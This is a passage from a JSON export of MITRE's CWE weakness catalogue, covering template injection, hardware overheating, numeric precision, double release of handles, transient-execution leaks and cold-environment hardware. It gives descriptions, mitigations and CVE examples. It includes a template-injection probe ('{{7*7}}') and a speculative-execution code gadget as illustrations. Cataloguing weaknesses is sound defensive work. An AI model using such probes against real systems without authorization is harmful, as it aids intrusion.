root takeover.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8835"},{"Reference":"CVE-2015-1607","Description":"Program is not properly handling signed bitwise left-shifts causing an overlapping memcpy memory range error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1607"},{"Reference":"CVE-2016-9842","Description":"Compression function improperly executes a signed left shift of a negative integer.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9842"},{"Reference":"CVE-2018-18445","Description":"Some kernels improperly handle right shifts of 32 bit numbers in a 64 bit register.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18445"},{"Reference":"CVE-2013-4206","Description":"Putty has an incorrectly sized shift value resulting in an overshift.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4206"},{"Reference":"CVE-2018-20788","Description":"LED driver overshifts under certain conditions resulting in a DoS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20788"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-03-29"}}},"1336":{"attr":{"@_ID":"1336","@_Name":"Improper Neutralization of Special Elements Used in a Template Engine","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine.","Extended_Description":{"xhtml:p":["Many web applications use template engines that allow developers to insert externally-influenced values into free text or messages in order to generate a full web page, document, message, etc. Such engines include Twig, Jinja2, Pug, Java Server Pages, FreeMarker, Velocity, ColdFusion, Smarty, and many others - including PHP itself. Some CMS (Content Management Systems) also use templates.","Template engines often have their own custom command or expression language. If an attacker can influence input into a template before it is processed, then the attacker can invoke arbitrary expressions, i.e. perform injection attacks. For example, in some template languages, an attacker could inject the expression \\"{{7*7}}\\" and determine if the output returns \\"49\\" instead. The syntax varies depending on the language.","In some cases, XSS-style attacks can work, which can obscure the root cause if the developer does not closely investigate the root cause of the error.","Template engines can be used on the server or client, so both \\"sides\\" could be affected by injection. The mechanisms of attack or the affected technologies might be different, but the mistake is fundamentally the same."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"94","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Interpreted","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Client Server","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Server-Side Template Injection / SSTI","Description":"This term is used for injection into template engines being used by a server."},{"Term":"Client-Side Template Injection / CSTI","Description":"This term is used for injection into template engines being used by a client."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The developer might choose a template engine that makes it easier for programmers to write vulnerable code."},{"Phase":"Implementation","Note":"The programmer might not use engine\'s built-in sandboxes or other capabilities to escape or otherwise prevent template injection from untrusted input."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a template engine that offers a sandbox or restricted mode, or at least limits the power of any available expressions, function calls, or commands."},{"Phase":"Implementation","Description":"Use the template engine\'s sandbox or restricted mode, if available."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-16783","Description":"server-side template injection in content management server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16783"},{"Reference":"CVE-2020-9437","Description":"authentication / identity management product has client-side template injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9437"},{"Reference":"CVE-2020-12790","Description":"Server-Side Template Injection using a Twig template","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12790"},{"Reference":"CVE-2021-21244","Description":"devops platform allows SSTI","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21244"},{"Reference":"CVE-2020-4027","Description":"bypass of Server-Side Template Injection protection mechanism with macros in Velocity templates","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4027"},{"Reference":"CVE-2020-26282","Description":"web browser proxy server allows Java EL expressions from Server-Side Template Injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26282"},{"Reference":"CVE-2020-1961","Description":"SSTI involving mail templates and JEXL expressions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1961"},{"Reference":"CVE-2019-19999","Description":"product does not use a \\"safe\\" setting for a FreeMarker configuration, allowing SSTI","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19999"},{"Reference":"CVE-2018-20465","Description":"product allows read of sensitive database username/password variables using server-side template injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20465"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1193"}},{"attr":{"@_External_Reference_ID":"REF-1194"}}]},"Notes":{"Note":{"#text":"Since expression languages are often used in templating languages, there may be some overlap with CWE-917 (Expression Language Injection). XSS (CWE-79) is also co-located with template injection.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-07-19"}}},"1338":{"attr":{"@_ID":"1338","@_Name":"Improper Protections Against Hardware Overheating","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A hardware device is missing or has inadequate protection features to prevent overheating.","Extended_Description":{"xhtml:p":["Hardware, electrical circuits, and semiconductor silicon have thermal side effects, such that some of the energy consumed by the device gets dissipated as heat and increases the temperature of the device. For example, in semiconductors, higher-operating frequency of silicon results in higher power dissipation and heat. The leakage current in CMOS circuits increases with temperature, and this creates positive feedback that can result in thermal runaway and damage the device permanently.","Any device lacking protections such as thermal sensors, adequate platform cooling or thermal insulation is susceptible to attacks by malicious software that might deliberately operate the device in modes that result in overheating. This can be used as an effective denial of service (DoS) or permanent denial of service (PDoS) attack.","Depending on the type of hardware device and its expected usage, such thermal overheating can also cause safety hazards and reliability issues. Note that battery failures can also cause device overheating but the mitigations and examples included in this submission cannot reliably protect against a battery failure.","There can be similar weaknesses with lack of protection from attacks based on overvoltage or overcurrent conditions. However, thermal heat is generated by hardware operation and the device should implement protection from overheating."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during hardware architecture, design or implementation."}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Dynamic tests should be performed to stress-test temperature controls.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Power management controls should be part of Architecture and Design reviews.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Temperature maximum and minimum limits should be enforced using thermal sensors both in silicon and at the platform level."},{"Phase":"Implementation","Description":"The platform should support cooling solutions such as fans that can be modulated based on device-operation needs to maintain a stable temperature."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Malicious software running on a core can execute instructions that consume maximum power or increase core frequency. Such a power-virus program could execute on the platform for an extended time to overheat the device, resulting in permanent damage.","Body_Text":["Execution core and platform do not support thermal sensors, performance throttling, or platform-cooling countermeasures to ensure that any software executing on the system cannot cause overheating past the maximum allowable temperature.","The platform and SoC should have failsafe thermal limits that are enforced by thermal sensors that trigger critical temperature alerts when high temperature is detected. Upon detection of high temperatures, the platform should trigger cooling or shutdown automatically."]}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1156"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"}}},"1339":{"attr":{"@_ID":"1339","@_Name":"Insufficient Precision or Accuracy of a Real Number","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program processes a real number with an implementation in which the number\u2019s representation does not preserve required accuracy and precision in its fractional part, causing an incorrect result.","Extended_Description":{"xhtml:p":["When a security decision or calculation requires highly precise, accurate numbers \u2013 such as financial calculations or prices \u2013 then small variations in the number could be exploited by an attacker.","There are multiple ways to store the fractional part of a real number in a computer. In all of these cases, there is a limit to the accuracy of recording a fraction. If the fraction can be represented in a fixed number of digits (binary or decimal), there might not be enough digits assigned to represent the number. In other cases the number cannot be represented in a fixed number of digits due to repeating in decimal or binary notation (e.g. 0.333333...) or due to a transcendental number such as \u03a0 or \u221a2. Rounding of numbers can lead to situations where the computer results do not adequately match the result of sufficiently accurate math."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"190","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"834","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"#text":"There are three major ways to store real numbers in computers. Each method is described along with the limitations of how they store their numbers.","xhtml:ol":{"xhtml:li":["Fixed: Some implementations use a fixed number of binary bits to represent both the integer and the fraction. In the demonstrative example about Muller\'s Recurrence, the fraction 108.0 - ((815.0 - 1500.0 / z) / y) cannot be represented in 8 binary digits. The numeric accuracy within languages such as PL/1, COBOL and Ada is expressed in decimal digits rather than binary digits. In SQL and most databases, the length of the integer and the fraction are specified by the programmer in decimal. In the language C, fixed reals are implemented according to ISO/IEC TR18037","Floating: The number is stored in a version of scientific notation with a fixed length for the base and the significand. This allows flexibility for more accuracy when the integer portion is smaller. When dealing with large integers, the fractional accuracy is less. Languages such as PL/1, COBOL and Ada set the accuracy by decimal digit representation rather than using binary digits. Python also implements decimal floating-point numbers using the IEEE 754-2008 encoding method.","Ratio: The number is stored as the ratio of two integers. These integers also have their limits. These integers can be stored in a fixed number of bits or in a vector of digits. While the vector of digits method provides for very large integers, they cannot truly represent a repeating or transcendental number as those numbers do not ever have a fixed length."]}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This weakness is introduced when the developer picks a method to represent a real number. The weakness may only be visible with very specific numeric inputs."}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"This weakness will generally lead to undefined results and therefore crashes. In some implementations the program will halt if the weakness causes an overflow during a calculation."},{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands","Note":"The results of the math are not as expected. This could cause issues where a value would not be properly calculated and provide an incorrect answer."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Read Application Data","Modify Application Data"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Patching and Maintenance"],"Description":"The developer or maintainer can move to a more accurate representation of real numbers. In extreme cases, the programmer can move to representations such as ratios of BigInts which can represent real numbers to extremely fine precision. The programmer can also use the concept of an Unum real. The memory and CPU tradeoffs of this change must be examined. Since floating point reals are used in many programs and many locations, they are implemented in hardware and most format changes will cause the calculations to be moved into software resulting in slower programs."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Muller\'s Recurrence is a series that is supposed to converge to the number 5. When running this series with the following code, different implementations of real numbers fail at specific iterations:","Example_Code":[{"#text":"fn rec_float(y: f64, z: f64) -> f64{108.0 - ((815.0 - 1500.0 / z) / y);}fn float_calc(turns: usize) -> f64{let mut x: Vec<f64> = vec![4.0, 4.25];(2..turns + 1).for_each(|number|{x.push(rec_float(x[number - 1], x[number - 2]));});x[turns]}","attr":{"@_Nature":"bad","@_Language":"Rust"},"xhtml:br":["","","","","","","","","","","","","","",""]},{"#text":"Use num_rational::BigRational;fn rec_big(y: BigRational, z: BigRational) -> BigRational{BigRational::from_integer(BigInt::from(108))- ((BigRational::from_integer(BigInt::from(815))- BigRational::from_integer(BigInt::from(1500)) / z)/ y)}fn big_calc(turns: usize) -> BigRational{let mut x: Vec<BigRational> = vec![BigRational::from_float(4.0).unwrap(), BigRational::from_float(4.25).unwrap(),];(2..turns + 1).for_each(|number|{x.push(rec_big(x[number - 1].clone(), x[number - 2].clone()));});x[turns].clone()}","attr":{"@_Nature":"good","@_Language":"Rust"},"xhtml:br":["","","","","","","","","","","","","","","","","","","",""]}],"Body_Text":{"#text":"The chart below shows values for different data structures in the rust language when Muller\u2019s recurrence is executed to 80 iterations. The data structure f64 is a 64 bit float. The data structures I<number>F<number> are fixed representations 128 bits in length that use the first number as the size of the integer and the second size as the size of the fraction (e.g. I16F112 uses 16 bits for the integer and 112 bits for the fraction). The data structure of Ratio comes in three different implementations: i32 uses a ratio of 32 bit signed integers, i64 uses a ratio of 64 bit signed integers and BigInt uses a ratio of signed integer with up to 2^32 digits of base 256. Notice how even with 112 bits of fractions or ratios of 64bit unsigned integers, this math still does not converge to an expected value of 5.","xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/Mullers-Recurrence-CWE-1339.png","@_alt":"Muller\'s Recurrence"}}}},{"Intro_Text":"On February 25, 1991, during the eve of the of an Iraqi invasion of Saudi Arabia, a Scud missile fired from Iraqi positions hit a US Army barracks in Dhahran, Saudi Arabia. It miscalculated time and killed 28 people [REF-1190].","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1190"}}}},{"Intro_Text":"Sleipner A, an offshore drilling platform in the North Sea was incorrectly constructed with an underestimate of 50% of strength in a critical cluster of buoyancy cells needed for construction. This led to a leak in buoyancy cells during lowering, causing a seismic event of 3.0 on the Richter Scale and about $700M loss [REF-1190].","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1190"}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-16069","Description":"Chain: series of floating-point precision errors\\n\\t\\t\\t(CWE-1339) in a web browser rendering engine causes out-of-bounds read\\n\\t\\t\\t(CWE-125), giving access to cross-origin data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16069"},{"Reference":"CVE-2017-7619","Description":"Chain: rounding error in floating-point calculations\\n\\t\\t\\t(CWE-1339) in image processor leads to infinite loop (CWE-835)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7619"},{"Reference":"CVE-2021-29529","Description":"Chain: machine-learning product can have a heap-based\\n\\t\\t\\tbuffer overflow (CWE-122) when some integer-oriented bounds are\\n\\t\\t\\tcalculated by using ceiling() and floor() on floating point values\\n\\t\\t\\t(CWE-1339)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision (CWE-1339) in\\n\\t\\t\\trandom-number generator causes some zero bits to be reliably\\n\\t\\t\\tgenerated, reducing the amount of entropy (CWE-331)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"},{"Reference":"CVE-2006-6499","Description":"Chain: web browser crashes due to infinite loop - \\"bad\\n\\t\\t\\tlooping logic [that relies on] floating point math [CWE-1339] to exit\\n\\t\\t\\tthe loop [CWE-835]\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6499"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1186"}},{"attr":{"@_External_Reference_ID":"REF-1187"}},{"attr":{"@_External_Reference_ID":"REF-1188"}},{"attr":{"@_External_Reference_ID":"REF-1189"}},{"attr":{"@_External_Reference_ID":"REF-1190"}},{"attr":{"@_External_Reference_ID":"REF-1191"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-07-08"}}},"1341":{"attr":{"@_ID":"1341","@_Name":"Multiple Releases of Same Resource or Handle","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product attempts to close or release a resource or handle more than once, without an intervening successful open.","Extended_Description":{"xhtml:p":["Code typically requires \\"opening\\" handles or references to resources such as memory, files, devices, connections, services, etc. When the code is finished with using the resource, it is typically expected to \\"close\\" or \\"release\\" the resource, which indicates to the environment (such as the OS) that the resource can be re-assigned or reused by unrelated processes or actors. APIs or other abstractions are often used to perform this release, such as free() or delete() within C/C++, or file-handle close() operations that are used in many languages.","Unfortunately, the implementation or design of such APIs might expect the developer to be responsible for ensuring that such APIs are only called once per release of the resource. if the developer attempts to release the same resource/handle more than onc, then the API\'s expectations are not met, resulting in undefined and/or insecure behavior. This could lead to consequences such as memory corruption, data corruption, execution path corruption, or other consequences.","Note that while the implementation for most (if not all) resource reservation allocations involve a unique identifier/pointer/symbolic reference, then if this identifier is reused, checking the identifier for resource closure may result in a false state of openness and closing of the wrong resource. For this reason, reuse of identifiers is discouraged."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Rust","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":"DoS: Crash, Exit, or Restart","Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"For commonly-used APIs and resource types, automated tools often have signatures that can spot this issue."},{"Method":"Automated Dynamic Analysis","Description":"Some compiler instrumentation tools such as AddressSanitizer (ASan) can indirectly detect some instances of this weakness."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When closing a resource, set the associated variable to NULL or equivalent value for the given language. Some APIs will ignore this null value or lead to application crashes or exceptions, which may be preferable to data/memory corruption."},{"Phase":"Implementation","Description":"Implementing a flag that is set when the resource is opened and cleared when it is closed and checked before closing can be effective at prevention."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example attempts to close the file twice. In some cases, the C library fclose() function will catch the error and return an error code. In other implementations, a double-free (CWE-415) occurs causing the program to fault. Note that the examples presented here are simplistic, and double fclose() calls will frequently be spread around a program, making them more difficult to find during code reviews.","Example_Code":[{"#text":"char b[2000];FILE *f = fopen(\\"dbl_cls.c\\", \\"r\\");if (f){}","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"b[0] = 0;fread(b, 1, sizeof(b) - 1, f);printf(\\"%s\\\\n\'\\", b);int r1 = fclose(f);printf(\\"\\\\n-----------------\\\\n1 close done \'%d\'\\\\n\\", r1);int r2 = fclose(f);\\t// Double closeprintf(\\"2 close done \'%d\'\\\\n\\", r2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""]}},{"#text":"char b[2000];FILE *f = fopen(\\"dbl_cls.c\\", \\"r\\");if (f){}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","",""],"xhtml:div":{"#text":"b[0] = 0;fread(b, 1, sizeof(b) - 1, f);printf(\\"%s\\\\n\'\\", b);int r1 = fclose(f);printf(\\"\\\\n-----------------\\\\n1 close done \'%d\'\\\\n\\", r1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}},{"#text":"char b[2000];int f_flg = 0;FILE *f = fopen(\\"dbl_cls.c\\", \\"r\\");if (f){}","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":{"#text":"f_flg = 1;b[0] = 0;fread(b, 1, sizeof(b) - 1, f);printf(\\"%s\\\\n\'\\", b);if (f_flg){}if (f_flg){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","",""],"xhtml:div":[{"#text":"int r1 = fclose(f);f_flg = 0;printf(\\"\\\\n-----------------\\\\n1 close done \'%d\'\\\\n\\", r1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"int r2 = fclose(f);\\t// Double closef_flg = 0;printf(\\"2 close done \'%d\'\\\\n\\", r2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}],"Body_Text":[{"#text":"This example only has one call to fclose(). While this is certainly the preferred handling of this problem, this simplistic method is not always possible.","xhtml:br":""},{"#text":"This example uses a flag to call fclose() only once. Note that this flag is explicit. The variable \\"f\\" could also have been used as it will be either NULL if the file is not able to be opened or a valid pointer if the file was successfully opened. If \\"f\\" is replacing \\"f_flg\\" then \\"f\\" would need to be set to NULL after the first fclose() call so the second fclose call would never be executed.","xhtml:br":""}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-13351","Description":"file descriptor double close can cause the wrong file to be associated with a file descriptor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13351"},{"Reference":"CVE-2006-5051","Description":"Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051"},{"Reference":"CVE-2004-0772","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0772"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1198"}},{"attr":{"@_External_Reference_ID":"REF-1199"}},{"attr":{"@_External_Reference_ID":"REF-1200"}},{"attr":{"@_External_Reference_ID":"REF-1201"}}]},"Notes":{"Note":{"#text":"The terms related to \\"release\\" may vary depending on the type of resource, programming language, specification, or framework. \\"Close\\" has been used synonymously for the release of resources like file descriptors and file handles. \\"Return\\" is sometimes used instead of Release. \\"Free\\" is typically used when releasing memory or buffers back into the system for reuse.","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2021-09-07"}}},"1342":{"attr":{"@_ID":"1342","@_Name":"Information Exposure through Microarchitectural State after Transient Execution","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The processor does not properly clear microarchitectural state after incorrect microcode assists or speculative execution, resulting in transient execution.","Extended_Description":{"xhtml:p":["In many processor architectures an exception, mis-speculation, or microcode assist results in a flush operation to clear results that are no longer required. This action prevents these results from influencing architectural state that is intended to be visible from software. However, traces of this transient execution may remain in microarchitectural buffers, resulting in a change in microarchitectural state that can expose sensitive information to an attacker using side-channel analysis. For example, Load Value Injection (LVI) [REF-1202] can exploit direct injection of erroneous values into intermediate load and store buffers.","Several conditions may need to be fulfilled for a successful attack:"],"xhtml:ul":{"xhtml:li":["1) incorrect transient execution that results in remanence of sensitive information;","2) attacker has the ability to provoke microarchitectural exceptions;","3) operations and structures in victim code that can be exploited must be identified."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":[{"attr":{"@_Class":"Workstation","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"x86","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"ARM","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}}],"Technology":[{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Requirements"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory","Execute Unauthorized Code or Commands"],"Likelihood":"Medium"}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Requirements"],"Description":"Hardware ensures that no illegal data flows from faulting micro-ops exists at the microarchitectural level.","Effectiveness":"High","Effectiveness_Notes":"Being implemented in silicon it is expected to fully address the known weaknesses with limited performance impact."},{"Phase":"Build and Compilation","Description":"Include instructions that explicitly remove traces of unneeded computations from software interactions with microarchitectural elements e.g. lfence, sfence, mfence, clflush.","Effectiveness":"High","Effectiveness_Notes":"This effectively forces the processor to complete each memory access before moving on to the next operation. This may have a large performance impact."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Faulting loads in a victim domain may trigger incorrect transient forwarding, which leaves secret-dependent traces in the microarchitectural state. Consider this example from [REF-1203].","Body_Text":["Consider the code gadget:",{"xhtml:p":["A processor with this weakness will store the value of untrusted_arg (which may be provided by an attacker) to the stack, which is trusted memory. Additionally, this store operation will save this value in some microarchitectural buffer, e.g. the store queue.","In this code gadget, \\n\\t\\t\\t\\t\\ttrusted_ptr is dereferenced while the attacker forces a page fault. The faulting load causes the processor to mis-speculate by forwarding untrusted_arg as the (speculative) load result. The processor then uses untrusted_arg for the pointer dereference. After the fault has been handled and the load has been re-issued with the correct argument, secret-dependent information stored at the address of trusted_ptr remains in microarchitectural state and can be extracted by an attacker using a code gadget."]}],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"void call_victim(size_t untrusted_arg) {}","xhtml:br":"","xhtml:div":{"#text":"*arg_copy = untrusted_arg;array[**trusted_ptr * 4096];","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2020-0551","Description":"Load value injection in some processors utilizing speculative execution may allow an authenticated user to enable information disclosure via a side-channel with local access.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0551"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1202"}},{"attr":{"@_External_Reference_ID":"REF-1203"}},{"attr":{"@_External_Reference_ID":"REF-1204"}},{"attr":{"@_External_Reference_ID":"REF-1205"}}]},"Notes":{"Note":{"#text":"CWE-1342 differs from CWE-1303, which is related to misprediction and biasing microarchitectural components, while CWE-1342 addresses illegal data flows and retention. For example, Spectre is an instance of CWE-1303 biasing branch prediction to steer the transient execution indirectly.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Anders Nordstrom, Alric Althoff","Submission_Organization":"Tortuga Logic","Submission_Date":"2021-09-22"}}},"1351":{"attr":{"@_ID":"1351","@_Name":"Improper Handling of Hardware Behavior in Exceptionally Cold Environments","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A hardware device, or the firmware running on it, is\\n missing or has incorrect protection features to maintain\\n goals of security primitives when the device is cooled below\\n standard operating temperatures.","Extended_Description":{"xhtml:p":["The hardware designer may improperly anticipate\\n hardware behavior when exposed to exceptionally cold\\n conditions. As a result they may introduce a weakness by not\\n accounting for the modified behavior of critical components\\n when in extreme environments.","An example of a change in behavior is that power loss\\n won\'t clear/reset any volatile state when cooled below\\n standard operating temperatures. This may result in\\n a weakness when the starting state of the volatile memory is\\n being relied upon for a security decision. For example, a\\n Physical Unclonable Function (PUF) may be supplied as a\\n security primitive to improve confidentiality,\\n authenticity, and integrity guarantees. However, when the\\n PUF is paired with DRAM, SRAM, or another temperature\\n sensitive entropy source, the system designer may introduce\\n weakness by failing to account for the 